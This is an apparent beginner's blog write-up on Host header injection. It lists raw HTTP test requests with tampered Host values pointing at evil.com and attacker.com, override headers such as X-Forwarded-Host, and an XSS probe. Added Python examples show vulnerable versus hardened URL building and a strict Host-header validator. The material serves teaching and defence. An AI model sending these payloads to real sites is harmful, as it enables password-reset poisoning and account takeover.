My First Write up on Host Header Injection Methods

Hi guys, I just wanted to share my hacking experience.

What is a Host header attack?

The Host header specifies which website or web application should process an incoming HTTP request. The web server uses the value of this header to dispatch the request to that website or web application.

What happens if we specify an invalid Host header?

Most web servers are configured to pass an unrecognised Host header to the first virtual host in the list. Therefore, it's possible to send requests with arbitrary Host headers to the first virtual host.

By using this attack, we can check whether the Host header is properly validated or not.

How to perform a Host header attack?

Initial testing is as simple as supplying another domain (e.g., attacker.com) in the Host header field. It is how the web server processes the header value that dictates the impact. The attack is valid when the web server processes the input to send the request to an attacker-controlled host that resides at the supplied domain, and not to an internal virtual host that resides on the web server.

Request:

GET / HTTP/1.1
Host: www.attacker.com
(…)

In the simplest case, this may cause a 302 redirect to the supplied domain (attacker.com).

Response:

HTTP/1.1 302 Found
(…)
Location: http://www.attacker.com/login.php
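The redirect above is the simplest symptom of an application that builds absolute URLs from whatever arrived in the Host header. The following is an added example, not code from the original post: it shows a Location header and a password-reset link built from the request's Host header, beside hardened versions that take the origin from configuration instead. The canonical host name, the request dicts and the token value are constructed assumptions.

```python
"""Added example (not from the original post): URL building that trusts the
Host header, beside the hardened form that uses a configured canonical host.

Constructed assumptions: the canonical host name, the request dicts and the
token value.
"""
from urllib.parse import urlunsplit

# Operator-controlled canonical origin, read from configuration in a real app.
# It is never derived from anything the client sent.
CANONICAL_SCHEME = "https"
CANONICAL_HOST = "vulnerable-website.com"  # assumed, matches the post's examples


def redirect_location_vulnerable(headers: dict, path: str = "/login.php") -> str:
    """The 302 from the post: Location is built from the incoming Host header.

    'Host: www.attacker.com' therefore sends the user to the attacker's server.
    """
    return f"http://{headers.get('Host', '')}{path}"


def redirect_location_hardened(headers: dict, path: str = "/login.php") -> str:
    """Redirect to the same path on the configured origin; Host is not consulted.

    The headers argument exists only for signature parity with the vulnerable
    version and is deliberately unused.
    """
    return urlunsplit((CANONICAL_SCHEME, CANONICAL_HOST, path, "", ""))


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """Password-reset link built from Host: the token is mailed to the real
    user, but the link it sits in points wherever the attacker said."""
    return f"https://{headers.get('Host', '')}/reset?token={token}"


def reset_link_hardened(headers: dict, token: str) -> str:
    """Same link built from the canonical host; the request's Host is ignored."""
    return urlunsplit((CANONICAL_SCHEME, CANONICAL_HOST, "/reset", f"token={token}", ""))


if __name__ == "__main__":
    # Constructed request carrying the tampered Host header from the post.
    tampered = {"Host": "www.attacker.com", "Accept": "*/*"}
    token = "TOKEN-PLACEHOLDER"  # constructed, not a real reset token
    print("vulnerable redirect:", redirect_location_vulnerable(tampered))
    print("hardened redirect:  ", redirect_location_hardened(tampered))
    print("vulnerable link:    ", reset_link_vulnerable(tampered, token))
    print("hardened link:      ", reset_link_hardened(tampered, token))
```

Whether the vulnerable build ends up in a Location header, a reset e-mail or a cached page, the fix is the same: route on the Host header if you must, but never let it name the origin in anything the application emits.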

How can we perform a Host header attack against a target application?

1. Add 2 Host headers in the request:

Eg: GET /api/reset-password HTTP/1.1
Host: vulnerable-website.com
Host: evil.com
Accept: */*
Accept-Language: en
Connection: close
Content-Length: 98

2. Bypass using these headers in the request:

X-Forwarded-Host: (payload here)
X-Original-Url:
X-Forwarded-Server:
X-Host:
X-Rewrite-Url:
X-Originating-IP:
X-Forwarded-For:
X-Remote-IP:
X-Remote-Addr:
X-Client-IP:

3. Try to use localhost in the Host header:

Eg: GET /api/reset-password HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
Connection: close
Content-Length: 98

4. Try to find XSS via the Host header:

Eg: GET /api/reset-password HTTP/1.1
Host: javascript:alert(1);
Accept: */*
Accept-Language: en
Connection: close
Content-Length: 98

5. Link-based Host header attack:

Eg: GET /api/reset-password HTTP/1.1
(…)
<link src="http://www.attacker.com/link" />
(…)

6. URL poisoning:

Eg: GET /api/reset-password HTTP/1.1
Host: www.vulnerable.com
Accept: */*
Accept-Language: en
Connection: close
Content-Length: 98

7. Try to bypass by extending the Host header value:

Methods

1. GET /api/reset-password HTTP/1.1
Host: vulnerable-website.com.evil.com

2. GET /api/reset-password HTTP/1.1
Host: vulnerable-website.com?evil.com

3. GET /api/reset-password HTTP/1.1
Host: evil.com/vulnerable-website.com
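Every technique in the list above (duplicate Host lines, override headers, localhost, a non-hostname value, and the suffix, query and path variants) is defeated by the same server-side rule: exactly one Host header, syntactically a hostname, exactly matching an allowlist. The following is an added example, not code from the original post: a Python check that parses raw requests while keeping duplicate headers, applies that rule, and records why each request is rejected, run over constructed requests modelled on the post's cases. The allowlist, the trusted-proxy flag and every sample request are assumptions. The web-server equivalent is a catch-all default virtual host that refuses unknown names instead of serving the first site in the list.

```python
"""Added example (not from the original post): a strict Host-header check run
over constructed requests modelled on the post's test cases. The allowlist,
the trusted-proxy flag and every sample request are constructed assumptions."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

ALLOWED_HOSTS = {"vulnerable-website.com", "www.vulnerable-website.com"}  # assumed

# Headers that proxies and some frameworks treat as a Host or client override.
# They only mean something when a proxy you control sets them; from anywhere
# else they are client input (the post's method 2) and must not affect routing.
OVERRIDE_HEADERS = {
    "x-forwarded-host", "x-host", "x-forwarded-server", "x-original-url",
    "x-rewrite-url", "x-originating-ip", "x-forwarded-for", "x-remote-ip",
    "x-remote-addr", "x-client-ip",
}

# RFC 1123 hostname labels with an optional :port. No scheme, path, query,
# trailing dot or whitespace, so 'javascript:alert(1);', 'a.com?evil.com' and
# 'evil.com/a.com' fail before any allowlist comparison happens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"^(?P<name>{_LABEL}(?:\.{_LABEL})*)(?::(?P<port>\d{{1,5}}))?$")


@dataclass
class HostCheck:
    ok: bool
    host: Optional[str] = None                       # canonical host if accepted
    findings: List[str] = field(default_factory=list)
    suspicious: List[str] = field(default_factory=list)  # override headers seen


def parse_request(raw: str) -> tuple:
    """Return (request line, ordered [(name, value)] header list).

    Duplicates are kept on purpose: collapsing headers into a dict is exactly
    how a second 'Host:' line slips past a check that only sees one value."""
    lines = raw.strip("\r\n").split("\n")
    headers = []
    for line in lines[1:]:
        line = line.rstrip("\r")
        if not line:
            break                                    # end of the header block
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0].strip(), headers


def check_host(raw: str, behind_trusted_proxy: bool = False) -> HostCheck:
    """Accept only one syntactically valid, allowlisted Host; record the rest."""
    _, headers = parse_request(raw)
    result = HostCheck(ok=False)

    result.suspicious = sorted({n for n, _ in headers if n in OVERRIDE_HEADERS})
    if result.suspicious and not behind_trusted_proxy:
        # Not fatal by itself, but worth logging: a client is trying to steer routing.
        result.findings.append("override headers from untrusted client ignored: "
                               + ", ".join(result.suspicious))

    hosts = [v for n, v in headers if n == "host"]
    if len(hosts) != 1:                              # missing or duplicated (method 1)
        result.findings.append(f"expected exactly one Host header, got {len(hosts)}")
        return result

    match = _HOST_RE.match(hosts[0])
    if not match:                                    # method 4, method 7 query/path forms
        result.findings.append(f"Host is not a valid hostname: {hosts[0]!r}")
        return result

    name = match.group("name").lower()
    if name not in ALLOWED_HOSTS:                    # localhost, attacker.com, suffix trick
        result.findings.append(f"Host not in allowlist: {name!r}")
        return result

    result.ok, result.host = True, name
    return result


# Constructed requests, one per technique in the post.
SAMPLE_REQUESTS: Dict[str, str] = {
    "legit":          "GET /api/reset-password HTTP/1.1\nHost: vulnerable-website.com\nAccept: */*\n",
    "redirect_probe": "GET / HTTP/1.1\nHost: www.attacker.com\n",
    "duplicate_host": "GET /api/reset-password HTTP/1.1\nHost: vulnerable-website.com\nHost: evil.com\n",
    "override":       "GET /api/reset-password HTTP/1.1\nHost: vulnerable-website.com\nX-Forwarded-Host: evil.com\n",
    "localhost":      "GET /api/reset-password HTTP/1.1\nHost: localhost\n",
    "xss_probe":      "GET /api/reset-password HTTP/1.1\nHost: javascript:alert(1);\n",
    "suffix":         "GET /api/reset-password HTTP/1.1\nHost: vulnerable-website.com.evil.com\n",
    "query":          "GET /api/reset-password HTTP/1.1\nHost: vulnerable-website.com?evil.com\n",
    "path":           "GET /api/reset-password HTTP/1.1\nHost: evil.com/vulnerable-website.com\n",
}


def classify_all(behind_trusted_proxy: bool = False) -> Dict[str, HostCheck]:
    return {label: check_host(raw, behind_trusted_proxy)
            for label, raw in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for label, res in classify_all().items():
        detail = "; ".join(res.findings) or f"host={res.host}"
        print(f"{label:15} {'ACCEPT' if res.ok else 'REJECT':7} {detail}")
```

Only the `legit` and `override` requests are accepted, and the latter is accepted with a finding because the X-Forwarded-Host line is ignored rather than honoured; set `behind_trusted_proxy=True` only when a proxy you operate strips and rewrites those headers before the request reaches the application.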

Any suggestions are most welcome; write a mail to Akash.venky091@gmail.com

or contact me @ https://www.linkedin.com/in/akash-h-c-4a4090a7/

A white hat Hacker...!!!